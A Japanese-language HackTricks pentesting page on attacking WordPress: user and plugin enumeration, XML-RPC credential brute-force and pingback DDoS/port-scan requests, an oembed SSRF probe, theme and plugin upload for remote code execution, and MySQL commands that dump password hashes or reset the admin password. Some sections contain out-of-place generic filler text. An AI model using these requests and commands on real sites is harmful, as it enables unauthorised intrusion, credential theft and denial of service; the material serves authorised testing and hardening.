hacktricks/network-services-pentesting/pentesting-web/wordpress.md

Wordpress

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ会社で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
• 公式のPEASS＆HackTricks swagを手に入れましょう。
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
• ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

基本情報

アップロードされたファイルは次の場所に保存されます：http://10.10.10.10/wp-content/uploads/2018/08/a.txt
テーマファイルは/wp-content/themes/にありますので、テーマのphpを変更してRCEを取得する場合は、おそらくこのパスを使用することになります。例えば：twentytwelveテーマを使用して、次の場所にある404.phpファイルにアクセスできます：/wp-content/themes/twentytwelve/404.php
別の有用なURLは次のとおりです：/wp-content/themes/default/404.php

wp-config.phpには、データベースのルートパスワードが記載されています。

チェックするデフォルトのログインパス：/wp-login.php、/wp-login/、/wp-admin/、/wp-admin.php、/login/

メインのWordPressファイル

• index.php
• license.txtには、インストールされているWordPressのバージョンなど、有用な情報が含まれています。
• wp-activate.phpは、新しいWordPressサイトの設定時にメールアクティベーションプロセスに使用されます。
• ログインフォルダ（非表示にするために名前が変更されている場合があります）：
• /wp-admin/login.php
• /wp-admin/wp-login.php
• /login.php
• /wp-login.php
• xmlrpc.phpは、WordPressの機能を表すファイルで、HTTPをトランスポートメカニズムとして、XMLをエンコーディングメカニズムとして使用してデータを送信することができます。このタイプの通信は、WordPressのREST APIによって置き換えられました。
• wp-contentフォルダは、プラグインとテーマが保存されるメインディレクトリです。
• wp-content/uploads/は、プラットフォームにアップロードされたファイルが保存されるディレクトリです。
• wp-includes/は、証明書、フォント、JavaScriptファイル、ウィジェットなどのコアファイルが保存されるディレクトリです。

ポストエクスプロイテーション

• wp-config.phpファイルには、WordPressがデータベースに接続するために必要な情報が含まれています。データベース名、データベースホスト、ユーザー名とパスワード、認証キーとソルト、データベーステーブルの接頭辞などです。この設定ファイルは、トラブルシューティングに役立つDEBUGモードをアクティブにするためにも使用できます。

ユーザーの権限

• 管理者
• エディター：自分自身と他の投稿を公開および管理します。
• 著者：自分自身の投稿を公開および管理します。
• 寄稿者：自分の投稿を書いて管理しますが、公開することはできません。
• 購読者：投稿を閲覧し、プロフィールを編集します。

パッシブエナメレーション

WordPressのバージョンを取得する

/license.txtまたは/readme.htmlのファイルを見つけることができるかどうかを確認します。

ページのソースコード内（例：https://wordpress.org/support/article/pages/からの例）：

• grep

curl https://victim.com/ | grep 'content="WordPress'

• meta name

• CSS link files

• JavaScript files

プラグインを取得する

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

テーマの取得

WordPressでは、テーマはウェブサイトの外観やレイアウトをカスタマイズするために使用されます。テーマは通常、WordPressの公式テーマディレクトリやテーママーケットプレイスから入手できます。

以下の手順に従って、WordPressでテーマを取得することができます。

1. WordPressの管理画面にログインします。
2. 「外観」メニューから「テーマ」を選択します。
3. 「新規追加」ボタンをクリックします。
4. テーマの一覧が表示されますので、興味のあるテーマを選択します。
5. テーマの詳細ページで、「プレビュー」ボタンをクリックして、テーマの外観を確認します。
6. テーマをインストールする場合は、「インストール」ボタンをクリックします。
7. インストールが完了したら、「有効化」ボタンをクリックして、テーマを有効にします。

これで、WordPressで新しいテーマを取得して利用することができます。

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

一般的なバージョンの抽出

WordPressのバージョンを特定するために、いくつかの方法があります。

1. メタデータの確認: WordPressのバージョンは、HTMLのメタデータ内に記載されていることがあります。ウェブページのソースコードを表示し、<meta name="generator" content="WordPress x.x.x" />という行を探します。x.x.xはWordPressのバージョン番号です。

2. リードミーの確認: WordPressのバージョンは、ウェブサイトのルートディレクトリにあるreadme.htmlファイルにも記載されています。このファイルを表示し、バージョン番号を確認します。

3. ディレクトリ名の確認: WordPressのバージョンは、インストールされたディレクトリ名にも含まれている場合があります。ウェブサイトのURLを確認し、/wp-content/themes/または/wp-content/plugins/の後に続くディレクトリ名にバージョン番号が含まれているか確認します。

これらの方法を使用して、WordPressのバージョンを特定することができます。

curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化することができます。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

アクティブな列挙

プラグインとテーマ

おそらく、すべてのプラグインとテーマを見つけることはできません。すべてを発見するには、プラグインとテーマのリストをアクティブにブルートフォースする必要があります（幸いなことに、このリストを含む自動化ツールがあります）。

ユーザー

IDブルート

WordPressサイトから有効なユーザーを取得するには、ユーザーIDをブルートフォースします：

curl -s -I -X GET http://blog.example.com/?author=1

もしレスポンスが200または30Xであれば、それはidが有効であることを意味します。もしレスポンスが400であれば、idは無効です。

wp-json

また、ユーザーに関する情報を取得するために、以下のようにクエリを試すこともできます。

curl http://blog.example.com/wp-json/wp/v2/users

この機能を有効にしているユーザーに関する情報のみ提供されます。

また、/wp-json/wp/v2/pagesはIPアドレスを漏洩する可能性があります。

ログインユーザー名の列挙

/wp-login.phpにログインする際、メッセージは、指定されたユーザー名が存在するかどうかによって異なります。

XML-RPC

xml-rpc.phpがアクティブな場合、資格情報の総当たり攻撃を実行したり、他のリソースへのDoS攻撃に使用することができます（たとえば、こちらを使用してこのプロセスを自動化することができます）。

アクティブかどうかを確認するには、_/xmlrpc.php_にアクセスし、次のリクエストを送信してください：

チェック

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

資格情報のブルートフォース攻撃

wp.getUserBlogs、wp.getCategories、または**metaWeblog.getUsersBlogs**は、資格情報のブルートフォース攻撃に使用できるいくつかのメソッドです。これらのいずれかを見つけることができれば、次のようなものを送信することができます。

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

正しいユーザー名とパスワードを使用しない場合、200コードのレスポンス内には「ユーザー名またはパスワードが正しくありません」というメッセージが表示されます。

正しい資格情報を使用すると、ファイルをアップロードすることができます。レスポンスにはパスが表示されます (https://gist.github.com/georgestephanis/5681982)。

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

また、同じリクエストで複数の資格情報を試すことができるため、system.multicallを使用して資格情報のブルートフォース攻撃を行うより速い方法があります。

2FAのバイパス

この方法はプログラム向けであり、人間向けではなく、古いため2FAをサポートしていません。したがって、有効な資格情報を持っているが、メインの入り口が2FAで保護されている場合、xmlrpc.phpを悪用して2FAをバイパスしてログインすることができるかもしれません。ただし、コンソールを介して行えるすべてのアクションを実行することはできませんが、Ippsecがhttps://www.youtube.com/watch?v=p8mIdm93mfw&t=1130sで説明しているように、まだRCEに到達することができるかもしれません。

DDoSまたはポートスキャン

リスト内に_pingback.ping_メソッドを見つけることができれば、Wordpressに任意のホスト/ポートに対してリクエストを送信させることができます。これを使用して、Wordpressの数千のサイトに特定の場所（したがって、その場所でDDoSが発生する）へのアクセスを要求することができます。または、Wordpressに内部のネットワークをスキャンさせることもできます（任意のポートを指定できます）。

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

もしfaultCodeの値が0よりも大きい（17）場合、それはポートが開いていることを意味します。

**system.multicall**の使用方法を前のセクションで確認して、このメソッドを乱用してDDoS攻撃を引き起こす方法を学んでください。

DDoS

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>

wp-cron.php DoS

このファイルは通常、Wordpressサイトのルートに存在します：/wp-cron.php
このファイルにアクセスすると、重いMySQL クエリが実行されるため、攻撃者はこれを使用してDoSを引き起こすことができます。
また、デフォルトでは、wp-cron.phpはすべてのページロード（クライアントがWordpressの任意のページをリクエストするたびに）で呼び出されるため、高トラフィックのサイトでは問題を引き起こす可能性があります（DoS）。

Wp-Cronを無効にし、ホスト内に必要なアクションを定期的に実行する実際のcronjobを作成することが推奨されています（問題を引き起こさずに）。

/wp-json/oembed/1.0/proxy - SSRF

https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net にアクセスして、Wordpressサイトがリクエストを行う可能性があります。

これは機能しない場合の応答です：

SSRF

{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}

このツールは、methodName: pingback.ping とパス /wp-json/oembed/1.0/proxy の存在をチェックし、存在する場合はそれらを悪用しようとします。

自動ツール

cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化することができます。
今すぐアクセスを取得してください：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

ビットを上書きしてアクセスを取得する

これは実際の攻撃ではなく、単なる興味です。CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-manでは、任意のWordPressファイルの1ビットを反転させることができます。したがって、ファイル/var/www/html/wp-includes/user.phpの位置5389を反転させて、NOT（!）操作をNOP化することができます。

if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(

パネルRCE

使用されているテーマのphpを変更する（管理者の資格情報が必要）

外観 → テーマエディター → 404テンプレート（右側）

phpシェルの内容を変更します：

インターネットで更新されたページにアクセスする方法を検索します。この場合、ここにアクセスする必要があります：http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

次のコマンドを使用できます：

use exploit/unix/webapp/wp_admin_shell_upload

プラグインRCE

PHPプラグイン

プラグインとして.phpファイルをアップロードすることが可能かもしれません。
例えば、次のようにしてPHPバックドアを作成します：

次に、新しいプラグインを追加します：

プラグインをアップロードして、「今すぐインストール」を押します：

「続行」をクリックします：

おそらく、これは何も起こらないように見えますが、メディアに移動すると、アップロードされたシェルが表示されます：

それにアクセスすると、逆シェルを実行するためのURLが表示されます：

悪意のあるプラグインのアップロードと有効化

(この部分は https://www.hackingarticles.in/wordpress-reverse-shell/からコピーされています)

WordPressのダッシュボードにアクセスできる場合、悪意のあるプラグインをインストールすることができます。ここでは、既に脆弱なプラグインをexploit dbからダウンロードしました。

練習用のプラグインをダウンロードするには、ここをクリックしてください。

プラグインのzipファイルがあるので、プラグインをアップロードします。

ダッシュボード > プラグイン > プラグインをアップロード

ダウンロードしたzipファイルを参照します。

パッケージが正常にインストールされたら、プラグインを有効化する必要があります。

すべてがうまく設定されている場合は、攻撃を開始します。脆弱なプラグイン「reflex-gallery」がインストールされているため、簡単にexploitできます。

この脆弱性のexploitはMetasploitフレームワーク内にありますので、以下のモジュールをロードし、次のコマンドを実行します：

上記のコマンドが実行されると、meterpreterセッションが確立されます。この記事で説明されているように、WordPressプラットフォームのウェブサイトをexploitするための複数の方法があります。

ポストエクスプロイテーション

ユーザー名とパスワードを抽出します：

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

管理者パスワードの変更方法:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

WordPressの保護

定期的な更新

WordPress、プラグイン、テーマが最新であることを確認してください。また、wp-config.phpで自動更新が有効になっていることも確認してください。

define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

また、信頼できるWordPressのプラグインとテーマのみをインストールしてください。

セキュリティプラグイン

• Wordfence Security
• Sucuri Security
• iThemes Security

その他の推奨事項

• デフォルトのadminユーザーを削除する
• 強力なパスワードと2要素認証を使用する
• 定期的にユーザーの権限を確認する
• ブルートフォース攻撃を防ぐために、ログイン試行回数を制限する
• **wp-admin.php**ファイルの名前を変更し、内部からのアクセスまたは特定のIPアドレスからのみアクセスを許可する。

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSを入手したいですか？または、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを発見しましょう、私たちの独占的なNFTコレクション
• 公式のPEASS＆HackTricksグッズを手に入れましょう
• 💬 Discordグループまたはtelegramグループに参加するか、Twitterで私をフォローしてください🐦@carlospolopm.
• ハッキングのトリックを共有するには、PRを hacktricks repo および hacktricks-cloud repo に提出してください。